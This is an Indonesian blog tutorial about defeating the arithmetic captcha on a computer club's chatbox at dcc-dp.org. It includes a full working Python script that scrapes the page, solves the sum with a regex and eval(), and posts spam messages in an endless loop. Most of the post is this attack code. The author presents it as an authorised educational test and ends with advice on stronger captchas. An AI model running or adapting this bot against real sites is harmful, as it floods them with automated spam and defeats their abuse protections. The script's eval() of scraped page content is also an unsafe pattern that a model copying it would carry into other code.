DCC chatbox Captcha bypassed

    Halo teman-teman back lagi dengan penulis kali ini penulis masih akan membahas sedikit tentang sebuah captcha . pada kali ini penulis membahas tentang captcha DCC pada chatbox . :) ya seperti di lihat sebelumnya banyak skali spammer yang berlalu lalang di chatbox dcc kemarin.kali ini penulis akan memberitahukan bagaimana sebenarnya spammer itu bisa membypass captcha DCC pada chatbox . tutorial ini hanya pembelajaran semata .beberapa jam yang lalu penulis memposting sebuah artikel http://dcc-dp.org/berita137-the-secret-of-captchabreaking-captcha-n-new-captcha-solution-.html (The Secret of Captcha[Breaking Captcha n New Captcha Solution ] ) .alangkah baiknya kalian membaca dulu artikel itu . :) ok langsung saja .
    
    Analyze the captcha
    Ya contoh pada captcha DCC seperti kita lihat tidak mengunakan image proccesing . hanya mengandalkan javascript generate atau bisa di dengan mengunakan php .setelah di analisis penulis menduga ini mengunakan php karena penulis tidak mendapatkan code javascript yang menghandle ini . bisa si penulis asumsikan seperti ini:
    [code]
      $hasil = $acak1 + $acak2;
      $_SESSION['capcay'] = $hasil;
    [/code]
    
    Diagram
[code]     

        +------------+
     +--|Parse html  |
     |  +------------+
     |        | +----------------+
     |        |_| get cookies and|
     |          | scrap captcha  |
     |          +----------------+
     |                  |                  
     |          +---------------+              
  +-----------+ | sum the string|  
  | Repeat  & | |               |   
  | Threading | +---------------+
  +-----------+         |
     |                  |    
     |            +--------------+  
     |            |   Post       |   
     |            | the Result   |
     |            | get response |
     |            +--------------+
     |_ ________________|

     #gambar lebih jelas : http://pastebin.com/gj1rasWM
[/code]                            
     
     Jadi di sini si penulis mengunakan teknik parse html / scraping http://dcc-dp.org/berita116-python--web-scraping--parsingscreen-scraping-web-pages-.html untuk mendapatkan captchanya beserta cookies / sessionnya untuk mendapatkan captcha sedikit mengunakan teknik regex. nah setelah captcha di dapatkan kita hitung captchanya dengan fungsi eval() dan post resultnya dan repeat dengan mengunakan threading .
     
     Analyze the html
     [code]
     .......
    

Nama :

http://

Message :

41 + 6 =
     .......
     lebih jelas : http://pastebin.com/TaR3pXTF
     [/code]
     
     Nah pada potongan code di atas kita melihat form method post dan action=proses.php dari sini kita tau bahwa code untuk post adalah proses.php ini yang dimana kita akan gunakan untuk mempost data2 yang kita butuhkan .dalam kali ini url http://dcc-dp.org/proses.php .
     next di sini ada tag2 html yang kta butuhkan sebagai key untuk post data
     yaitu      mari kita lihat implementasinya pada code kita .
     
     [code]
     values = {'name' :'raiseofbot',
               'url'  :'http://arnold.com',
           'message': 'Your Captcha is bypassed !!',
           'jawaban': angka,
           'submit' :'Kirim'
      }
      post_data = urllib.urlencode(values)
      HTML = urllib2.Request('http://dcc-dp.org/proses.php', post_data) <-- data di post .
      [/code]
      
      nah sekarang bagaimana dapatkan captchanya ??
      simple coba lihat ini 41 + 6 = < / font> so bagaimana ?? ya dengan sedikit keahlian regex(regular express http://docs.python.org/library/re.html)
      
      coba lihat code ini :
      [code]
      re1='.*?(\\+)(.).*?(=)'
      # .*? = dapatkan apapun yang berupa angka di dalam tag
      # (\\+) = nah karena captcha ini cuman hanya penambahan jadi kita bisa cari yang dimana ada tanda tambah
      # (.).*?(=) = nah cari setelah penambahan ada sebuah angka lagi dan akhir adalah =
      # di atas adalah penjelasan regex . ada baiknya kalian baca2 regex kalau ingin lebih tau .
      
      rg = re.compile(re1,re.IGNORECASE|re.DOTALL) <-- setelah berhasil compile patternya
      m = rg.search(htmlcode_page) <-- dan cari patternya di dalam var htmlcode_page yang var ini berisi semua isi page beranda dcc
      if m: <-- dan jika ketemu
         c1=m.group() <--maka dapatkan semua hasilnya.yang dimana hasilnya itu contoh : "4+4 ="
         c2 = c1.replace('','').replace('=','') <--nah kita perlu menghapus "" jadi gunakan replace()
         angka = eval(''.join([str(x) for x in c2])) <-- masukan hasil ke eval agar di proses dan di dapatkan hasilnya
      [/code]
      
      dan akhirnya captcha terbypass dengan begitu mudahnya :D .. ini code lengkapnya .
[code]
#!/usr/bin/env python
#coder by jimmyromanticdevil
#DCC chatbox Captcha bypassed
#Dedicate for DCC (Dipanegara Computer Club)
import urllib2
import urllib
import cookielib
import re
import time
import threading
from threading import Thread

def main():
  print "|=============== [ the Raise of Robot ] ===============|"
  print "|===============DCC chatbox Captcha bypassed===========|"
  print "\==============Coder by jimmyromanticdevil ============/"
  while True:    
      #----------------------code untuk mendapatkan Cookies/session------------#
      cookieJar = cookielib.LWPCookieJar()
      opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookieJar))
      #----------------------------------#
      opener.addheaders = [('User-agent', "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506)")]
      HTML = urllib2.Request('http://dcc-dp.org/beranda')
      Page = opener.open(HTML)
      htmlcode_page = Page.read()
      re1='.*?(\\+)(.).*?(=)'
      rg = re.compile(re1,re.IGNORECASE|re.DOTALL)
      m = rg.search(htmlcode_page)
      if m:
         c1=m.group()
         c2 = c1.replace('','').replace('=','')
         angka = eval(''.join([str(x) for x in c2]))
         print 'Captcha : %s dan Hasil :%s'%(c2,angka)
         values = {'name' : 'raiseofbot',
               'url'  : 'http://arnold.com',
               'message' : 'Your Captcha is bypassed !!',
               'jawaban' : angka,
                'submit':'Kirim'
      }
         post_data = urllib.urlencode(values)
         HTML = urllib2.Request('http://dcc-dp.org/proses.php', post_data)
         Page = opener.open(HTML)
         print '0-> Succes Baypassed'
       

if __name__ == '__main__':
    t = Thread(target=main)
    t.start()
[/code]      
    
    Maka outputnya akan seperti begini :
    http://i44.tinypic.com/30neo36.jpg

 

    http://i43.tinypic.com/16hjm9i.jpg
    
    Wah jadi ternyata begitu yah caranya spammer memasuki chatbox DCC .. iya begitu lah konsepnya ... ;) Nah Pada hari ini juga saya masih menjalankan code ini tetapi sudah tidak work respon yang bagus dari admin ka sate :) .. kenapa ?? karena ad sedikit perubahan pada code htmlnya ..tapi sayang captcha ini masih mengunakan konsep di atas .jadi captcha ini masih bisa di bypass dengan mengunakan konsep di atas.. :)
    
    Kesimpulan :
     Jadi kita tau bahwa captcha seperti begini bersifat sangat lemah . terbukti dengan sedikit pengetahuan html parse/scrap di padukan dengan regular express ( regex ) kita sudah bisa membypass sebuah captcha seperti ini . untuk solusi2 captcha yang baik dari saya silahkan baca lagi sampai selesai artikel saya sebelumnya . http://jimmyromanticdevil.wordpress.com/2011/12/18/the-secret-of-captchabreaking-captcha-n-new-captcha-solution/ . atau bisa mengunakan captcha sepakbola yang sudah di terapkan pada saat kita ingin komentar postingan di DCC . captcha itu lumyan bagus dan secure . :) ok saya rasa cukup untuk tutorial kali ini . kalau ada salah mohon maaf . :) makasih buat ka sate di ijinkan test securty captchanya Chatbox Dcc .. ok tutorial ini di tujukan untuk pembelajaran tidak untuk hal2 yang negatif . ok semogah berguna .. happy coding dan researching .. ^,^
     
     Special thanks to my princess , Kak Sate,Hardiknas, K Ahmad Asto,dn all sister n my broth at DCC (Dipanegara Computer Club) and you . Without u all i am nothing .. :)
     
     Real Source :
     http://jimmyromanticdevil.wordpress.com/2011/12/18/dcc-chatbox-captcha-bypassedbasic-consep-of-spammer/